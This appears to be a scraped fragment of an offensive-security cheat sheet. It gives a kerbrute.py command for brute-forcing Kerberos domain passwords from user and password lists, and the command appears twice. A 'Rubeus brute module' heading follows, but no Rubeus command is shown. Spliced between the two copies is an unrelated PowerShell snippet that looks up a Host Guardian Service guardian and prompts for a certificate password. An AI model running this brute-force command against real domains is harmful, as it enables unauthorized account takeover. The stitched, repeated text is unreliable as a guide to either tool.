With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| $GuardianName = 'UntrustedGuardian' | |
| $CertificatePassword = Read-Host -Prompt 'Please enter a password to secure the certificate files' -AsSecureString | |
| $guardian = Get-HgsGuardian -Name $GuardianName | |
| if (-not $guardian) | |
| { | |
| throw "Guardian '$GuardianName' could not be found on the local system." | |
| } |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: